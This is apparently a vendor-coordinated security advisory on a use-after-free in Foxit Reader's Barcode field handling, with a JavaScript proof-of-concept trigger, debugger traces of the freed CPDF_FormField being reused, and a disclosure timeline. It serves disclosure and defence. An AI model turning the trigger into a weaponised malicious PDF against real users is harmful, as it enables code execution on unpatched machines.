SUMMARY

A use-after-free vulnerability exists in the way Foxit Reader handles a Barcode field object. A specially crafted JavaScript code inside a malicious PDF document can trigger this vulnerability, which can lead to memory corruption and result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site if the browser plugin extension is enabled.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Foxit Reader 2025.2.0.33046

PRODUCT URLS

Foxit Reader - https://www.foxitsoftware.com/pdf-reader/

CVSSv3 SCORE

8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-416 - Use After Free

DETAILS

Foxit PDF Reader is one of the most popular PDF document readers. It aims for feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface. Foxit Reader uses the V8 JavaScript engine.

Javascript support in PDF renderers and editors enables dynamic documents that can change based on user input or events. There exists a use-after-free vulnerability in the way Foxit Reader handles a Barcode object. This can be illustrated by the following proof-of-concept code:

function main() { 

    getField("Barcode Field0").setAction("Calculate",'delete_page();'); 
    app.activeDocs[0].addField('aaaa', "radiobutton", 1, [18,7,3,20] ) ; 
    app.activeDocs[0].getField('aaaa').checkThisBox(0,true);  
}

function delete_page() { 
    event.value = 'b'; 
    app.activeDocs[0].deletePages();

}

The above code simply assigns a callback function to the Calculate event for the field Barcode Field0, which is promptly triggered by a call to getField. In the action callback, a call to deletePages is made, which in turn frees all the objects associated with a page. The use-after-free vulnerability occurs when a CPDF_FormField object is freed by deletePages() and subsequently accessed without any validation. We can observe the following in the debugger (with PageHeap enabled):

FoxitPDFReader!safe_vsnprintf+0x337ca7:
00007ff6`b79f6ec7 b948000000      mov     ecx,48h  ;<---------------------- (1)
0:000> p
FoxitPDFReader!safe_vsnprintf+0x337cac:
00007ff6`b79f6ecc e87f882c00      call    FoxitPDFReader!safe_vsnprintf+0x600530 (00007ff6`b7cbf750);<----------------- (2)
0:000> p
FoxitPDFReader!safe_vsnprintf+0x337cb1:
00007ff6`b79f6ed1 488985d8000000  mov     qword ptr [rbp+0D8h],rax ss:00000019`12ef8b58=0000017cfca95fb0
0:000> r
rax=0000017cdade0fb0 rbx=0000017c91a39fd0 rcx=000000007ffe0380
rdx=d0d0d0d0d0d0d0d0 rsi=0000000000400000 rdi=0000017cfca95fb0
rip=00007ff6b79f6ed1 rsp=0000001912ef8980 rbp=0000001912ef8a80
 r8=0000000000000000  r9=0000000000000000 r10=0000000000000000
r11=0000017cdade0fb0 r12=0000017cfca95fb0 r13=0000000000000000
r14=00007ff6bccd4ce4 r15=0000017c91a39ed0
iopl=0         nv up ei pl nz na pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
FoxitPDFReader!safe_vsnprintf+0x337cb1:
00007ff6`b79f6ed1 488985d8000000  mov     qword ptr [rbp+0D8h],rax ss:00000019`12ef8b58=0000017cfca95fb0
0:000> dd rax                                                          ;<----------------- (3)
0000017c`dade0fb0  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
0000017c`dade0fc0  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
0000017c`dade0fd0  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
0000017c`dade0fe0  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
0000017c`dade0ff0  c0c0c0c0 c0c0c0c0 d0d0d0d0 d0d0d0d0
0000017c`dade1000  ???????? ???????? ???????? ????????
0000017c`dade1010  ???????? ???????? ???????? ????????
0000017c`dade1020  ???????? ???????? ???????? ????????
0:000> p
FoxitPDFReader!safe_vsnprintf+0x337cb8:
00007ff6`b79f6ed8 4c8bbdd0000000  mov     r15,qword ptr [rbp+0D0h] ss:00000019`12ef8b50=0000017c91a39ed0
0:000> p
FoxitPDFReader!safe_vsnprintf+0x337cbf:
00007ff6`b79f6edf 4885c0          test    rax,rax
0:000> p
FoxitPDFReader!safe_vsnprintf+0x337cc2:
00007ff6`b79f6ee2 7413            je      FoxitPDFReader!safe_vsnprintf+0x337cd7 (00007ff6`b79f6ef7) [br=0]
0:000> p
FoxitPDFReader!safe_vsnprintf+0x337cc4:
00007ff6`b79f6ee4 4c8bc7          mov     r8,rdi
0:000> p
FoxitPDFReader!safe_vsnprintf+0x337cc7:
00007ff6`b79f6ee7 498bd7          mov     rdx,r15
0:000> p
FoxitPDFReader!safe_vsnprintf+0x337cca:
00007ff6`b79f6eea 488bc8          mov     rcx,rax
0:000> p
FoxitPDFReader!safe_vsnprintf+0x337ccd:
00007ff6`b79f6eed e88e3d0100      call    FoxitPDFReader!safe_vsnprintf+0x34ba60 (00007ff6`b7a0ac80) ;<----------------- (4)
0:000> p
FoxitPDFReader!safe_vsnprintf+0x337cd2:
00007ff6`b79f6ef2 4c8bf0          mov     r14,rax
0:000> dq 0000017c`dade0fb0   ;<----------------------------------- (5)
0000017c`dade0fb0  00000905`00000004 0000017c`91a39ed0
0000017c`dade0fc0  0000017c`fca95fb0 00000000`00000000
0000017c`dade0fd0  00000000`00000000 00000000`00000000
0000017c`dade0fe0  00000008`00000000 c0c0c0c0`00000000
0000017c`dade0ff0  00000000`00000000 d0d0d0d0`d0d0d0d0
0000017c`dade1000  ????????`???????? ????????`????????
0000017c`dade1010  ????????`???????? ????????`????????
0000017c`dade1020  ????????`???????? ????????`????????

The CPDF_InterForm::AddTerminalField method creates a CPDF_FormField object by calling a function at (2), and the size of the object is passed to the function at (1). After allocation, the vulnerable object is examined at (3). The method called at (4) initializes the CPDF_FormField object. After the initialization, its content can be observed at (5).

0:000> r
rax=0000000000000001 rbx=0000017c91a39fd0 rcx=0000017cb4260000
rdx=0000017cb4260000 rsi=0000017cb0fa0fc0 rdi=0000017cdade0fb0
rip=00007ff6b79f99b1 rsp=0000001912efccc0 rbp=000000000000000c
 r8=0000000000000000  r9=0000000000000001 r10=00000000ffffffef
r11=0000001912efcbf0 r12=0000001912efcd98 r13=0000017c91a39ed0
r14=0000000000000000 r15=0000017cfca95fb0
iopl=0         nv up ei pl nz na pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
FoxitPDFReader!safe_vsnprintf+0x33a791:
00007ff6`b79f99b1 488bcf          mov     rcx,rdi   ; <----------------------------- (6)
0:000> p
FoxitPDFReader!safe_vsnprintf+0x33a794:
00007ff6`b79f99b4 e8775e2c00      call    FoxitPDFReader!safe_vsnprintf+0x600610 (00007ff6`b7cbf830)  ; <----------------------------- (7)
0:000> p
FoxitPDFReader!safe_vsnprintf+0x33a799:
00007ff6`b79f99b9 49c7042400000000 mov     qword ptr [r12],0 ds:00000019`12efcd98=0000017cdade0fb0
0:000> dq 0000017cdade0fb0                         ; <----------------------------- (8)
0000017c`dade0fb0  ????????`???????? ????????`????????
0000017c`dade0fc0  ????????`???????? ????????`????????
0000017c`dade0fd0  ????????`???????? ????????`????????
0000017c`dade0fe0  ????????`???????? ????????`????????
0000017c`dade0ff0  ????????`???????? ????????`????????
0000017c`dade1000  ????????`???????? ????????`????????
0000017c`dade1010  ????????`???????? ????????`????????
0000017c`dade1020  ????????`???????? ????????`????????
0:000> p
FoxitPDFReader!safe_vsnprintf+0x33a7a1:
00007ff6`b79f99c1 41c6859100000001 mov     byte ptr [r13+91h],1 ds:0000017c`91a39f61=01

Later, when the JavaScript API deletePages() is called, it frees all the objects associated with the page. It invokes CPDF_InterForm::DeleteField, which frees the vulnerable CPDF_FormField object. The register RCX at (6) contains the vulnerable CPDF_FormField object. The method called at (7) frees the object, and the content of the object is examined at (8) after the free operation.

The vulnerable object is later used without any validation. This can be observed in a debugger at the time of the crash:

0:000> g
FoxitPDFReader!safe_vsnprintf+0x351e0b:
00007ff6`b7a1102b 8b01            mov     eax,dword ptr [rcx] ds:0000017c`dade0fb0=???????? <------------------- (9)
0:000> u
FoxitPDFReader!safe_vsnprintf+0x351e0b:
00007ff6`b7a1102b 8b01            mov     eax,dword ptr [rcx]
00007ff6`b7a1102d 83c0fe          add     eax,0FFFFFFFEh
00007ff6`b7a11030 83f806          cmp     eax,6
00007ff6`b7a11033 0f872a060000    ja      FoxitPDFReader!safe_vsnprintf+0x352443 (00007ff6`b7a11663)
00007ff6`b7a11039 4898            cdqe
00007ff6`b7a1103b 488d0dbeef3ffe  lea     rcx,[FoxitPDFReader (00007ff6`b5e10000)]
00007ff6`b7a11042 448b8c81b016c001 mov     r9d,dword ptr [rcx+rax*4+1C016B0h]
00007ff6`b7a1104a 4c03c9          add     r9,rcx
0:000> kb
 # RetAddr               : Args to Child                                                           : Call Site
00 00007ff6`b766ca94     : 00000000`00000001 00000019`12efdce0 0000017c`dade0f00 0000017c`91a35f01 : FoxitPDFReader!safe_vsnprintf+0x351e0b
01 00007ff6`b765ffc8     : 0000017c`fa12ff01 0000017c`ffffffff 0000017c`fa12ffb0 0000017c`fa12ffb0 : FoxitPDFReader!std::basic_streambuf<char,std::char_traits<char> >::pubimbue+0xf3cb4
02 00007ff6`b7a0aff6     : 00007ff6`bccd4cc4 00000000`00000001 00000019`12efde30 0000017c`98a24fe0 : FoxitPDFReader!std::basic_streambuf<char,std::char_traits<char> >::pubimbue+0xe71e8
03 00007ff6`b8df82d6     : 0000017c`fa12ffb0 00000000`00000000 0000017d`00000000 00007ff6`b8d50a01 : FoxitPDFReader!safe_vsnprintf+0x34bdd6
04 00007ff6`b8dd10e3     : 0000017c`989f6f01 00000000`00000000 0000017c`989ecff0 0000017c`989ecff0 : FoxitPDFReader!safe_vsnprintf+0x17390b6
05 00007ff6`b92b4d79     : 0000017c`989c3ff0 00000019`12efe048 0000017c`989ecff0 0000017c`989f6fe0 : FoxitPDFReader!safe_vsnprintf+0x1711ec3
06 00007ff6`b983ab76     : 0000017d`63e2b0d0 00000019`12efdfb0 00000296`001b832d 00000019`12efe010 : FoxitPDFReader!FXJSE_GetClass+0x3d9
07 00007ff6`b9838e31     : 00000296`000af9b9 0000017c`8f4cc000 00000296`001801a1 00000296`00000069 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x3074b6
08 00007ff6`b9838e31     : 00000296`001ed861 00000296`00206cd1 00000296`00206d21 00000296`00000069 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x305771
09 00007ff6`b9836560     : 00000296`001ed861 00000296`00000775 00000296`00206cd1 00000000`0000001a : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x305771
0a 00007ff6`b98360b7     : 00000000`00000000 00000000`00000000 00000000`00000002 00000000`00000000 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x302ea0
0b 00007ff6`b930b08f     : 00000019`12efe48c 00000019`12efe379 00000019`12efe4f8 00000000`00000005 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x3029f7
0c 00007ff6`b930ab34     : 00000019`12efe4f8 0000017c`8f4cc000 00000296`00200005 0000017c`8f4d5110 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0x559cf
0d 00007ff6`b92eaa2b     : 0000017c`8f4cc2b0 00000019`12efe5a0 0000017c`98480a50 0000017d`63e2b020 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0x55474
0e 00007ff6`b92ea791     : 0000017d`63e2b050 0000017d`63e2b018 0000017c`8f4cc000 0000017c`81237fc0 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3536b
0f 00007ff6`b92b2756     : 0000017c`cf5c6ff0 0000017d`63e2b050 0000017d`63e2b018 0000017c`cf5c6ff0 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0x350d1
10 00007ff6`b92b369b     : 0000017d`63e2b050 0000017c`cf5c6ff0 0000017d`63e24e80 0000017d`63e2b020 : FoxitPDFReader!FXJSE_Runtime_Release+0x1126
11 00007ff6`b8d69bed     : 00000000`00000000 0000017d`63e18fb8 0000017d`63e18fb8 0000017d`63e18fb0 : FoxitPDFReader!FXJSE_ExecuteScript+0x27b
12 00007ff6`b69bd4b5     : 0000017d`00000003 00000000`00000002 00000019`12efe970 00000019`12efe8b0 : FoxitPDFReader!safe_vsnprintf+0x16aa9cd
13 00007ff6`b69bc063     : 0000017c`970d1ff0 00000019`12efe920 00000000`00000000 0000017c`82756fb0 : FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x3a7e65
14 00007ff6`b69ba6b6     : 00007ff6`b69ba5e0 0000017c`970d1ff0 0000017c`fac54d00 0000017c`fc58ffb0 : FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x3a6a13
15 00007ff6`b60338b9     : 00007ff6`b69ba5e0 00000019`12efea60 0000017c`8ed07dc8 0000017c`df225fd0 : FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x3a5066
16 00007ff6`b62bdc4e     : 0000017c`8234ecb0 00000000`00020712 0000017c`82756fb0 00000019`12eff810 : FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x78f9
17 00007ff6`bae235a2     : 00000000`000001a9 00000000`00000001 00007ff6`b62bdbd0 00000000`00000000 : FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::put+0x6f73e
18 00007ff6`bae24aaf     : 0000017c`8234ecb0 00000000`00000001 00000000`00000000 00000000`00000001 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x18efee2
19 00007ff6`bae1d9d4     : 00000000`00000000 0000017c`ba016eb8 00000000`00000001 00000000`00000429 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x18f13ef
1a 00007ff6`bae1e494     : 00007ff6`bda0d048 00000000`00020712 0000017c`ba016e78 00007ff6`bae14038 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x18ea314
1b 00007ffc`65d6ef5c     : 00000000`00000001 0000017c`ba016e20 00000000`00020712 00000000`00020712 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x18eadd4
1c 00007ffc`65d6e684     : 00000000`00000000 00007ff6`bae1e440 00000019`12cb0800 00007ff6`bae15ce4 : USER32!UserCallWinProcCheckWow+0x50c
1d 00007ff6`b623d22a     : 00007ff6`bae1e440 0000017c`dea5a600 00000000`00000001 00007ff6`bdbcc190 : USER32!DispatchMessageWorker+0x494
1e 00007ff6`b623d324     : 00000000`00000001 00007ff6`bdbcc190 00000000`00000000 00000000`00000000 : FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x1593aa
1f 00007ff6`bb345df3     : 00000000`00000001 00007ff6`b5e10000 00000000`00000000 0000017c`b42ddf7c : FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x1594a4
20 00007ff6`bb0837ba     : 00000000`00000001 00000000`00000000 00000000`00000000 00000000`00000000 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x1e12733
21 00007ffc`664f7374     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x1b500fa
22 00007ffc`670dcc91     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
23 00000000`00000000     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
0:000> !ext.heap -p -a 0000017c`dade0fb0
    address 0000017cdade0fb0 found in
    _DPH_HEAP_ROOT @ 17cb4261000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                17ce773e068:      17cdade0000             2000
    00007ffc671892b4 ntdll!RtlDebugFreeHeap+0x0000000000000038
    00007ffc670b5cc1 ntdll!RtlpFreeHeap+0x00000000000000c1
    00007ffc670b5b74 ntdll!RtlpFreeHeapInternal+0x0000000000000464
    00007ffc670b47b1 ntdll!RtlFreeHeap+0x0000000000000051
    00007ff6bb1b887c FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x0000000001c851bc
    00007ff6b7cbfc79 FoxitPDFReader!safe_vsnprintf+0x0000000000600a59
    00007ff6b7cbf846 FoxitPDFReader!safe_vsnprintf+0x0000000000600626
    00007ff6b79f99b9 FoxitPDFReader!safe_vsnprintf+0x000000000033a799
    00007ff6b79f9666 FoxitPDFReader!safe_vsnprintf+0x000000000033a446
    00007ff6b78ff4dd FoxitPDFReader!safe_vsnprintf+0x00000000002402bd
    00007ff6b78ffc96 FoxitPDFReader!safe_vsnprintf+0x0000000000240a76
    00007ff6b60705f7 FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0x000000000001b6f7
    00007ff6b6110856 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x000000000002c9d6
    00007ff6b6111235 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x000000000002d3b5
    00007ff6b6b97d14 FoxitPDFReader!CryptUIWizExport+0x0000000000020ba4
    00007ff6b8e5ba3c FoxitPDFReader!safe_vsnprintf+0x000000000179c81c
    00007ff6b8e220d3 FoxitPDFReader!safe_vsnprintf+0x0000000001762eb3
    00007ff6b92b4d79 FoxitPDFReader!FXJSE_GetClass+0x00000000000003d9
    00007ff6b983ab76 FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x00000000003074b6
    00007ff6b9838e31 FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x0000000000305771
    00007ff6b9838e31 FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x0000000000305771
    00007ff6b9836560 FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x0000000000302ea0
    00007ff6b98360b7 FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x00000000003029f7
    00007ff6b930b08f FoxitPDFReader!CFXJSE_Arguments::GetValue+0x00000000000559cf
    00007ff6b930ab34 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x0000000000055474
    00007ff6b92eaa2b FoxitPDFReader!CFXJSE_Arguments::GetValue+0x000000000003536b
    00007ff6b92ea791 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x00000000000350d1
    00007ff6b92b2756 FoxitPDFReader!FXJSE_Runtime_Release+0x0000000000001126
    00007ff6b92b369b FoxitPDFReader!FXJSE_ExecuteScript+0x000000000000027b
    00007ff6b8d69bed FoxitPDFReader!safe_vsnprintf+0x00000000016aa9cd
    00007ff6b766ca42 FoxitPDFReader!std::basic_streambuf<char,std::char_traits<char> >::pubimbue+0x00000000000f3c62
    00007ff6b765ffc8 FoxitPDFReader!std::basic_streambuf<char,std::char_traits<char> >::pubimbue+0x00000000000e71e8

The crash occurs at (9) when the object is dereferenced without any validation. Depending on the memory layout of the process, it may be possible to perform arbitrary read and write operations, which could ultimately be exploited to achieve arbitrary code execution.

TIMELINE

2025-09-25 - Vendor Disclosure
2025-12-19 - Vendor Patch Release
2025-12-19 - Public Release